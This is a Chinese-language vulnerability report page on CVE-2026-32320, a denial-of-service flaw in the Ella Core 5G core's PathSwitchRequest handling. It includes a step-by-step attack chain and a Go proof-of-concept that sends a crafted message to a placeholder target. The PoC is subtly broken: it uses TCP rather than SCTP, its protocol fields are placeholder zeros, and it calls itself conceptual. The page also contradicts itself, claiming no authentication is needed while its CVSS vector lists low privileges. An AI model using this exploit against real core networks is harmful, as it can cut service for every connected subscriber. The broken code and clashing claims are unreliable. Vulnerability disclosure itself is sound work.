IPBUF安全漏洞报告
English
CVE-2026-32320 CVSS 6.5 中危

CVE-2026-32320 | Ella Core 5G核心PathSwitchRequest零长度算法位串拒绝服务漏洞

披露日期: 2026-03-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-32320
漏洞类型
拒绝服务(DoS)
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Ella Core

相关标签

拒绝服务5G核心网NGAP协议Ella CoreCVE-2026-32320PathSwitchRequestUE Security Capabilities私有网络

漏洞概述

Ella Core是专为私有网络设计的5G核心网产品。在1.5.1之前的版本中,存在一个拒绝服务漏洞。该漏洞源于处理PathSwitchRequest消息时,对UE Security Capabilities中NR加密或完整性保护算法位串的长度验证不足。当收到包含零长度算法位串的恶意构造消息时,程序会触发panic导致进程崩溃。由于5G核心网承载所有连接用户的话务,攻击者无需认证即可通过发送特制的NGAP消息使整个系统不可用,影响范围覆盖所有已连接的订阅者。此漏洞属于高可用性影响低复杂度的攻击类型,CVSS评分6.5,建议尽快升级至1.5.1版本以修复此问题。

技术细节

该漏洞发生在Ella Core处理NGAP协议中PathSwitchRequest消息的环节。当UE(用户设备)进行切换时,会向目标基站发送PathSwitchRequest消息,其中包含UE Security Capabilities IE(信息元素),用于传输NR加密算法和完整性保护算法支持的位串。漏洞根因在于程序未正确验证这些位串的长度,当收到长度为0的位串时,会导致断言失败或空指针解引用,进而触发Go语言的panic机制。由于Ella Core采用Go语言编写(从项目结构推测),panic会直接终止当前goroutine甚至整个进程。攻击者只需构造一个符合NGAP协议格式但包含零长度算法位串的PathSwitchRequest消息,即可触发漏洞,无需任何认证或特殊权限。

攻击链分析

STEP 1
步骤1
建立SCTP连接:攻击者首先与目标Ella Core建立SCTP传输层连接,通常通过端口38412
STEP 2
步骤2
完成NG Setup流程:发送NG Setup Request和Response,建立正常的NGAP会话上下文
STEP 3
步骤3
建立UE上下文:通过Initial UE Message建立UE连接上下文,获取有效的RAN UE NGAP ID
STEP 4
步骤4
发送恶意PathSwitchRequest:构造包含零长度NR加密和完整性保护算法位串的PathSwitchRequest消息
STEP 5
步骤5
触发panic:Ella Core处理该消息时,因长度验证缺失导致程序panic,进程崩溃
STEP 6
步骤6
服务中断:所有已连接用户的会话中断,新用户无法接入,直至服务重启

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2026-32320 PoC - PathSwitchRequest with Zero-Length Algorithm Bitstrings // Target: Ella Core < 1.5.1 // This PoC demonstrates sending a malicious PathSwitchRequest message package main import ( "encoding/binary" "net" ) const NGAP_PORT = 38412 // NGAP Protocol IE Types const ( UE_SECURITY_CAPABILITIES = 0x00 PATH_SWITCH_REQUEST = 0x00 ) //构造包含零长度算法位串的UE Security Capabilities IE func buildZeroLengthAlgorithmBitstrings() []byte { // UE Security Capabilities IE with zero-length bitstrings ie := []byte{ 0x00, 0x00, // Protocol IE ID (UE Security Capabilities) 0x00, // Criticality (reject) 0x00, // Presence (mandatory) } // Length - 2 bytes for NR encryption and integrity algorithms // But we will set length to minimum and use zero-length bitstrings ie = append(ie, 0x00, 0x02) // Length = 2 // NR encryption algorithms - ZERO LENGTH (this triggers the vulnerability) ie = append(ie, 0x00) // NR integrity protection algorithms - ZERO LENGTH ie = append(ie, 0x00) // Add padding for other optional fields if needed return ie } //构造PathSwitchRequest消息 func buildMaliciousPathSwitchRequest() []byte { msg := []byte{ // NGAP PDU Header 0x00, 0x00, // Procedure Code (Path Switch Request) 0x00, // Criticality } // Add malicious UE Security Capabilities IE msg = append(msg, buildZeroLengthAlgorithmBitstrings()...) return msg } func main() { target := "TARGET_IP:38412" // Replace with target Ella Core IP conn, err := net.Dial("tcp", target) if err != nil { panic("Failed to connect: " + err.Error()) } defer conn.Close() maliciousMsg := buildMaliciousPathSwitchRequest() // Send the malicious message _, err = conn.Write(maliciousMsg) if err != nil { panic("Failed to send: " + err.Error()) } println("Malicious PathSwitchRequest sent. Target should panic.") } // Note: This is a conceptual PoC. Actual implementation requires: // 1. Valid SCTP association establishment // 2. Proper NGAP message encoding per 3GPP TS 38.413 // 3. Valid RAN UE NGAP ID and AMF UE NGAP ID // 4. Proper PDU Session Resource Switched List if required

影响范围

Ella Core < 1.5.1

防御指南

临时缓解措施
在正式补丁发布前,可采取以下临时缓解措施:1)通过网络分段隔离Ella Core核心网组件,限制可发起NGAP连接的源地址范围;2)部署IPS/IDS规则检测包含异常UE Security Capabilities的PathSwitchRequest消息;3)监控核心网组件进程状态,设置自动告警和重启机制;4)仅允许受信任的基站(gNB)连接核心网控制面。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表